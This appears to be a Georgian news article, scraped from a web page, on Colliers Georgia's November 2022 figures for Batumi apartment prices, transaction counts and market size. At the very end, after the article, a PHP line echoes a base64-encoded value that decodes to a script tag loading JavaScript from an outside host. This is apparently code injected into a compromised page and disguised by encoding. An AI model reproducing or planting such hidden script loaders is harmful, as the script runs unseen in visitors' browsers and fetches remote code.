celsiusi
ავერსი საქკაბელი

ბათუმში 2022 წლის ნოემბერში ახალაშენებული ბინების საშუალო შეწონილი ფასი 21%-ით გაიზარდა და კვ.მ-ზე $888 შეადგინა. ძველი ბინების შემთხვევაში კი მაჩვენებელი 4%-ით, $739-მდე გაიზარდა - ამის შესახებ Colliers Georgia-ს მიერ უძრავი ქონების ბაზრის საცოხვრებელი ბინების სეგმენტის განახლებულ მიმოხილვაშია აღნიშნული.

მათი მონაცემებით, გასულ თვეს, ბათუმში საცხოვრებელი ბინების ტრანზაქციების რაოდენობა გასული წლის ნოემბერთან შედარებით 67%-ით, 1,632 ერთეულამდე გაიზარდა, ბაზრის ზომა კი 84%-ით გაიზარდა და $74 მილიონი შეადგინა.

ამასთან, ახალაშენებული ბინების ტრანზაქციების რაოდენობა 71%-ით გაიზარდა, ძველი ბინების შემთხვევაში კი 37%-იანი ზრდა დაფიქსირდა.

ბათუმში 2022 წლის ნოემბერში მოთხოვნა ახალაშენებულ მედიუმ და პრემიუმ სეგმენტის ბინებზე მნიშვნელოვნად, 80%-ით და 171%-ით გაიზარდა, ეკონომ სეგმენტში კი მოთხოვნის 45%-იანი ზრდა დაფიქსირდა და 761 ბინა გაიყიდა.

469
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");